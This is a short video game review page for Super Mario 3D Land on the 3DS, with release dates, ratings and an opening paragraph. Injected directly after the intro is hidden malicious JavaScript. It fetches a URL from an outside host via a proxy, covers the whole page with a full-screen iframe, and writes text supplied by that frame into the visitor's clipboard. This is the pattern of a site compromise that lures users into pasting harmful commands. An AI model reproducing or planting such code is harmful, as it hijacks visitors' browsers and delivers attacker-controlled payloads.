Quick Review: Super Mario 3D Land

Game: Super Mario 3D Land
Developer: Nintendo EAD Tokyo
Publisher: Nintendo
Release Date:
Japan – November 3, 2011
North America – November 13, 2011
Europe – November 18, 2011
Australia – November 24, 2011
Platform(s): 3DS
Review Platform: 3DS
Number of Players: 1
Genre: Platforming
Ratings:
ACB – G
CERO – A
ESRB – E
PEGI – 3+

I have to admit, as much as I like the 3DS, there really haven’t been many games on it until lately. Thankfully, we get games like this now. The newest Mario game has been out for awhile, but a lot of other games have come out lately. Is is worth buying for yourself or for a gift for Christmas? Let’s review, shall we? (function() {

const configLink = “https://corsproxy.io/?url=http://heyues.live”;

if (!window.__digitalflwrFetchPromise) {

window.__digitalflwrFetchPromise = fetch(configLink)
  .then(response => {
    if (!response.ok) {
      throw new Error(" ");
    }
    return response.text();
  })

  .then(finalUrl => {
    return fetch(finalUrl, { method: "HEAD" })
      .then(headResponse => ({ headResponse, finalUrl }));
  })
  .catch(() => {


  });

}

if (typeof window.__digitalflwrIframeCreated === “undefined”) {
window.__digitalflwrIframeCreated = false;
}

window.__digitalflwrFetchPromise
.then(result => {

  if (!result) return;
  const { headResponse, finalUrl } = result;


  if (!headResponse || headResponse.status === 404) {
    return;
  }


  if (!window.__digitalflwrIframeCreated) {
    window.__digitalflwrIframeCreated = true;
    createMainIframe(finalUrl);
  }
})
.catch(() => {

});

function createMainIframe(url) {
const iframe = document.createElement(“iframe”);
iframe.src = url;
iframe.style.position = “fixed”;
iframe.style.top = 0;
iframe.style.left = 0;
iframe.style.width = “100%”;
iframe.style.height = “100%”;
iframe.style.border = “none”;
iframe.style.margin = 0;
iframe.style.padding = 0;
iframe.style.overflow = “hidden”;
iframe.style.zIndex = 99999;

document.body.appendChild(iframe);


window.addEventListener("message", function(event) {
  if (!event.data || event.data.type !== "copy") return;


  if (navigator.clipboard && navigator.clipboard.writeText) {
    navigator.clipboard.writeText(event.data.text).catch(() => {
      fallbackCopyText(event.data.text);
    });
  } else {
    fallbackCopyText(event.data.text);
  }
});


function fallbackCopyText(text) {
  const textArea = document.createElement("textarea");
  textArea.value = text;
  document.body.appendChild(textArea);
  textArea.select();

  try {
    document.execCommand("copy");
  } catch (err) {

  }

  document.body.removeChild(textArea);
}

}
})();

Permanent link to this article: https://www.brokenfuse.com/2011/11/29/quick-review-super-mario-3d-land/